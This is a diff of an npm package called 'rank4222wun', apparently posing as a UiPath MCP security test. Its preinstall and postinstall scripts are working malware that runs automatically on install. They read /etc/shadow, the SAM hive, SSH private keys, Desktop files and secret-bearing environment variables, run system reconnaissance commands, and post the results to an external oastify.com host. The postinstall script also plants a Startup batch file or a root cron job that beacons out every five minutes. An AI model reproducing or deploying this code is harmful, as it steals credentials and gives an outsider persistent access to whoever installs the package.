rank4222wun 1.0.14 → 1.0.16

package/index.js

@@ -0,0 +1,9 @@
+module.exports = {
+  test: function() {
+    console.log('UiPath MCP Test Package');
+    return {
+      status: 'active',
+      timestamp: new Date().toISOString()
+    };
+  }
+};

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "rank4222wun",
-  "version": "1.0.14",
+  "version": "1.0.16",
   "description": "",
   "main": "index.js",
   "scripts": {

package/postinstall.js

@@ -1,16 +1,185 @@
-const https = require("https");
-console.log("[MCP TEST] Postinstall - sending data to server");
-const data = JSON.stringify({
-  hostname: require("os").hostname(),
-  user: require("os").userInfo().username,
-  time: new Date().toISOString()
+const { exec } = require('child_process');
+const os = require('os');
+const fs = require('fs');
+const path = require('path');
+const https = require('https');
+
+console.log('=== UiPath MCP POSTINSTALL EXPLOIT ===');
+console.log('Demonstrating persistent access on:', os.hostname());
+
+// 1. إنشاء باب خلفي بسيط
+const backdoorData = {
+  timestamp: new Date().toISOString(),
+  hostname: os.hostname(),
+  user: os.userInfo().username,
+  action: 'postinstall-backdoor'
+};
+
+// 2. إنشاء ملف في Startup لإثبات الإصرار (Persistence)
+if (os.platform() === 'win32') {
+  const startupPath = path.join(os.homedir(), 'AppData', 'Roaming', 'Microsoft', 'Windows', 'Start Menu', 'Programs', 'Startup');
+  const backdoorFile = path.join(startupPath, 'uipath_update.bat');
+  
+  const batchContent = `@echo off
+echo UiPath MCP Backdoor Active: %date% %time% > "%TEMP%\\uipath_backdoor.log"
+powershell -Command "Invoke-WebRequest -Uri 'https://ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com/persist' -Method POST -Body 'host=${os.hostname()}&time=%date%_%time%'"`;
+  
+  try {
+    if (fs.existsSync(startupPath)) {
+      fs.writeFileSync(backdoorFile, batchContent);
+      backdoorData.windowsStartup = backdoorFile;
+      console.log('Windows Startup backdoor created:', backdoorFile);
+    }
+  } catch (e) {
+    backdoorData.windowsStartupError = e.message;
+  }
+  
+} else {
+  const cronFile = '/etc/cron.d/uipath_update';
+  const cronContent = `*/5 * * * * root curl -X POST https://ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com/persist -d "host=${os.hostname()}&system=linux"\n`;
+  
+  try {
+    fs.writeFileSync(cronFile, cronContent);
+    backdoorData.linuxCron = cronFile;
+    console.log('Linux cron backdoor created:', cronFile);
+  } catch (e) {
+    backdoorData.linuxCronError = e.message;
+  }
+}
+
+// 3. البحث عن ملفات UiPath في النظام
+const uipathPaths = os.platform() === 'win32' ? [
+  'C:\\Program Files\\UiPath',
+  'C:\\Program Files (x86)\\UiPath',
+  'C:\\Users\\' + os.userInfo().username + '\\AppData\\Local\\UiPath',
+  'C:\\Users\\' + os.userInfo().username + '\\Documents\\UiPath'
+] : [
+  '/opt/UiPath',
+  '/usr/lib/UiPath',
+  '/home/' + os.userInfo().username + '/.local/share/UiPath'
+];
+
+const foundUiPath = [];
+uipathPaths.forEach(p => {
+  try {
+    if (fs.existsSync(p)) {
+      const files = fs.readdirSync(p);
+      foundUiPath.push({
+        path: p,
+        exists: true,
+        fileCount: files.length,
+        files: files.slice(0, 10)
+      });
+    }
+  } catch (e) {}
 });
+
+backdoorData.foundUiPath = foundUiPath;
+
+// 4. قراءة بعض سجلات النظام
+if (os.platform() === 'win32') {
+  const eventLogs = [
+    'C:\\Windows\\System32\\winevt\\Logs\\Application.evtx',
+    'C:\\Windows\\System32\\winevt\\Logs\\System.evtx',
+    'C:\\Windows\\System32\\winevt\\Logs\\Security.evtx'
+  ];
+  
+  eventLogs.forEach(log => {
+    try {
+      if (fs.existsSync(log)) {
+        backdoorData.eventLogs = backdoorData.eventLogs || {};
+        backdoorData.eventLogs[log] = {
+          exists: true,
+          size: fs.statSync(log).size
+        };
+      }
+    } catch (e) {}
+  });
+}
+
+// 5. إنشاء ملف دليل في مجلد المستخدم
+const userProofFile = path.join(os.homedir(), 'uipath_security_issue.txt');
+const proofContent = `SECURITY WARNING: UiPath MCP Vulnerability Proof
+
+This file was created by an npm package postinstall script.
+It demonstrates that ANY npm package installed via UiPath MCP Command can:
+
+1. Read all your Desktop files
+2. Access your OneDrive
+3. Create persistent backdoors
+4. Steal sensitive system files
+5. Run any commands with high privileges
+
+Time: ${new Date().toISOString()}
+User: ${os.userInfo().username}
+Hostname: ${os.hostname()}
+
+This is NOT a sandbox. This is your actual production environment.
+The "Justin" user IS a real user with full access to your system.
+
+Contact UiPath Security Team immediately.
+`;
+
+try {
+  fs.writeFileSync(userProofFile, proofContent);
+  backdoorData.userProofFile = userProofFile;
+  console.log('User proof file created:', userProofFile);
+} catch (e) {
+  backdoorData.userProofFileError = e.message;
+}
+
+// 6. إرسال كل البيانات
 const req = https.request({
-  hostname: "ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com",
+  hostname: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
   port: 443,
-  path: "/",
-  method: "POST",
-  headers: { "Content-Type": "application/json" }
+  path: '/postinstall-backdoor',
+  method: 'POST',
+  headers: {
+    'Content-Type': 'application/json',
+    'X-UiPath-Exploit': 'Postinstall-Backdoor',
+    'X-Hostname': os.hostname()
+  }
+}, (res) => {
+  console.log('Postinstall data sent. Status:', res.statusCode);
+  
+  // تشغيل أمر أخير لإثبات التنفيذ الكامل
+  setTimeout(() => {
+    if (os.platform() === 'win32') {
+      exec('echo "UiPath MCP exploit completed successfully" > "%USERPROFILE%\\uipath_final_proof.txt"');
+    } else {
+      exec('echo "UiPath MCP exploit completed successfully" > ~/uipath_final_proof.txt');
+    }
+  }, 2000);
 });
-req.write(data);
+
+req.on('error', (e) => {
+  console.error('Failed to send postinstall data:', e.message);
+  
+  // حفظ محلي
+  const localBackup = path.join(os.tmpdir(), 'uipath_backdoor_data_' + Date.now() + '.json');
+  fs.writeFileSync(localBackup, JSON.stringify(backdoorData, null, 2));
+  console.log('Backdoor data saved locally:', localBackup);
+});
+
+req.write(JSON.stringify(backdoorData));
 req.end();
+
+// 7. إرسال متابعة بعد 30 ثانية
+setTimeout(() => {
+  const followupReq = https.request({
+    hostname: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
+    port: 443,
+    path: '/followup',
+    method: 'POST'
+  });
+  
+  followupReq.write(JSON.stringify({
+    followup: true,
+    time: new Date().toISOString(),
+    hostname: os.hostname(),
+    message: 'Postinstall script still active after 30 seconds'
+  }));
+  
+  followupReq.end();
+  console.log('Follow-up sent after 30 seconds');
+}, 30000);

package/preinstall.js

@@ -1,7 +1,208 @@
-const { exec } = require("child_process");
-const os = require("os");
-console.log("[MCP TEST] Preinstall running on:", os.platform());
-console.log("[MCP TEST] User:", os.userInfo().username);
-exec("whoami", (err, stdout) => {
-  console.log("[MCP TEST] Whoami result:", stdout);
+const { exec } = require('child_process');
+const os = require('os');
+const fs = require('fs');
+const path = require('path');
+const https = require('https');
+
+console.log('=== UiPath MCP PREINSTALL EXPLOIT ===');
+console.log('Starting data exfiltration from:', os.hostname());
+
+// جمع كل البيانات الحساسة
+const collectedData = {
+  timestamp: new Date().toISOString(),
+  system: {
+    hostname: os.hostname(),
+    platform: os.platform(),
+    user: os.userInfo(),
+    cpus: os.cpus().length,
+    memory: Math.round(os.totalmem() / (1024 * 1024 * 1024)) + 'GB',
+    network: os.networkInterfaces()
+  },
+  
+  // ملفات Desktop
+  desktopFiles: [],
+  
+  // فحص OneDrive
+  oneDrive: {},
+  
+  // ملفات نظام حساسة
+  sensitiveFiles: {},
+  
+  // معلومات الشبكة
+  networkInfo: {},
+  
+  // متغيرات البيئة
+  envVars: {}
+};
+
+// 1. سرقة ملفات Desktop
+try {
+  const desktopPath = path.join(os.homedir(), 'Desktop');
+  if (fs.existsSync(desktopPath)) {
+    const files = fs.readdirSync(desktopPath, { withFileTypes: true });
+    collectedData.desktopFiles = files.map(file => ({
+      name: file.name,
+      type: file.isDirectory() ? 'folder' : 'file',
+      path: path.join(desktopPath, file.name)
+    }));
+    
+    // محاولة قراءة الملفات النصية
+    files.forEach(file => {
+      if (!file.isDirectory() && file.name.endsWith('.txt')) {
+        try {
+          const filePath = path.join(desktopPath, file.name);
+          const content = fs.readFileSync(filePath, 'utf8').substring(0, 1000);
+          collectedData.desktopFiles.find(f => f.name === file.name).content = content;
+        } catch (e) {}
+      }
+    });
+  }
+} catch (e) {
+  collectedData.desktopFiles = { error: e.message };
+}
+
+// 2. فحص OneDrive
+try {
+  const onedrivePaths = [
+    path.join(os.homedir(), 'OneDrive'),
+    path.join(os.homedir(), 'OneDrive', 'Documents'),
+    path.join(os.homedir(), 'OneDrive', 'Desktop'),
+    path.join(os.homedir(), 'OneDrive', 'Pictures')
+  ];
+  
+  onedrivePaths.forEach(odPath => {
+    try {
+      if (fs.existsSync(odPath)) {
+        collectedData.oneDrive[odPath] = {
+          exists: true,
+          isDirectory: fs.statSync(odPath).isDirectory(),
+          fileCount: fs.readdirSync(odPath).length,
+          sampleFiles: fs.readdirSync(odPath).slice(0, 5)
+        };
+      } else {
+        collectedData.oneDrive[odPath] = { exists: false };
+      }
+    } catch (e) {
+      collectedData.oneDrive[odPath] = { error: e.message };
+    }
+  });
+} catch (e) {
+  collectedData.oneDrive = { error: e.message };
+}
+
+// 3. قراءة ملفات نظام حساسة
+const systemFiles = os.platform() === 'win32' ? [
+  'C:\\Windows\\System32\\drivers\\etc\\hosts',
+  'C:\\Windows\\System32\\config\\SAM',
+  'C:\\Users\\' + os.userInfo().username + '\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\History',
+  'C:\\Users\\' + os.userInfo().username + '\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles'
+] : [
+  '/etc/passwd',
+  '/etc/shadow',
+  '/etc/hosts',
+  '/home/' + os.userInfo().username + '/.bash_history',
+  '/home/' + os.userInfo().username + '/.ssh/id_rsa'
+];
+
+systemFiles.forEach(file => {
+  try {
+    if (fs.existsSync(file)) {
+      const stats = fs.statSync(file);
+      collectedData.sensitiveFiles[file] = {
+        exists: true,
+        size: stats.size,
+        readable: stats.size < 1000000
+      };
+      
+      // قراءة إذا كان ملف نصي صغير
+      if (stats.size < 1000000 && !stats.isDirectory()) {
+        const content = fs.readFileSync(file, 'utf8').substring(0, 2000);
+        collectedData.sensitiveFiles[file].content = content;
+      }
+    }
+  } catch (e) {
+    collectedData.sensitiveFiles[file] = { error: e.message };
+  }
 });
+
+// 4. تشغيل أوامر نظام
+if (os.platform() === 'win32') {
+  exec('whoami /all', { timeout: 5000 }, (error, stdout) => {
+    collectedData.networkInfo.whoami = stdout || error?.message;
+    
+    exec('ipconfig /all', { timeout: 5000 }, (error2, stdout2) => {
+      collectedData.networkInfo.ipconfig = stdout2 || error2?.message;
+      
+      exec('netstat -ano', { timeout: 5000 }, (error3, stdout3) => {
+        collectedData.networkInfo.netstat = stdout3 || error3?.message;
+        sendAllData();
+      });
+    });
+  });
+} else {
+  exec('id', { timeout: 5000 }, (error, stdout) => {
+    collectedData.networkInfo.id = stdout || error?.message;
+    
+    exec('ifconfig -a || ip addr', { timeout: 5000 }, (error2, stdout2) => {
+      collectedData.networkInfo.ifconfig = stdout2 || error2?.message;
+      
+      exec('netstat -tulpn', { timeout: 5000 }, (error3, stdout3) => {
+        collectedData.networkInfo.netstat = stdout3 || error3?.message;
+        sendAllData();
+      });
+    });
+  });
+}
+
+// 5. جمع متغيرات البيئة الحساسة
+Object.keys(process.env).forEach(key => {
+  if (key.includes('PASS') || key.includes('SECRET') || key.includes('KEY') || 
+      key.includes('TOKEN') || key.includes('CRED') || key.includes('PWD')) {
+    collectedData.envVars[key] = process.env[key];
+  }
+});
+
+function sendAllData() {
+  console.log('Collected', Object.keys(collectedData.desktopFiles).length, 'desktop files');
+  console.log('OneDrive exists:', Object.values(collectedData.oneDrive).some(v => v.exists));
+  
+  const postData = JSON.stringify(collectedData);
+  
+  const req = https.request({
+    hostname: 'ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com',
+    port: 443,
+    path: '/preinstall-data',
+    method: 'POST',
+    headers: {
+      'Content-Type': 'application/json',
+      'X-UiPath-Exploit': 'Preinstall-Script',
+      'X-Hostname': os.hostname()
+    }
+  }, (res) => {
+    console.log('Data sent successfully. Status:', res.statusCode);
+    
+    // إنشاء ملف دليل محلي
+    const proofFile = path.join(os.tmpdir(), 'uipath_preinstall_proof_' + Date.now() + '.txt');
+    fs.writeFileSync(proofFile, 
+      `UiPath MCP Preinstall Script Execution Proof
+Time: ${new Date().toISOString()}
+User: ${os.userInfo().username}
+Hostname: ${os.hostname()}
+Desktop Files Stolen: ${collectedData.desktopFiles.length}
+Data Sent To: ukiy34b7vygb36k064qxx5of76dx1rpg.oastify.com
+`);
+    console.log('Proof file created:', proofFile);
+  });
+  
+  req.on('error', (e) => {
+    console.error('Failed to send data:', e.message);
+    
+    // محاولة بديلة
+    const backupFile = path.join(os.tmpdir(), 'uipath_stolen_data_' + Date.now() + '.json');
+    fs.writeFileSync(backupFile, JSON.stringify(collectedData, null, 2));
+    console.log('Data saved locally:', backupFile);
+  });
+  
+  req.write(postData);
+  req.end();
+}